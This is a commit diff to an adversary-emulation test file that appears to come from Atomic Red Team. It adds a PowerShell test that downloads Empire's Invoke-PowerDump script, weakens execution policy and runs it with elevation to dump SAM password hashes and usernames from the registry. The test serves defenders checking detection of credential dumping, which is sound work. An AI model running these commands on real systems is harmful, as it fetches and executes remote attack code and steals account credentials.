Update T1003.002.yaml for PowerDump (#1196)
* Update T1003.002.yaml for PowerDump Added PowerDump to parse SAM and SYSTEM for usernames and Hash * Add fixes Updated with fixes. Its not erroring with Multiple cleanup Removed preReqs, don't need them Removed SAM and SYSTEM file dep... PowerDump can just Dump Registry for Hashes and Usernames * Getting permanent links to file Added permanent link to PowerDump in BC-SECURITY Github * updated description Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Jesse Moore
@@ -78,4 +78,18 @@ atomic_tests:
|
||||
del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
|
||||
|
||||
- name: PowerDump Registry dump of SAM for hashes and usernames
|
||||
description: Executes a hashdump by reading the hasshes from the registry.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |-
|
||||
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
|
||||
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
|
||||
Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
|
||||
Import-Module .\PowerDump.ps1
|
||||
Invoke-PowerDump
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
|
||||
|
||||
Reference in New Issue
Block a user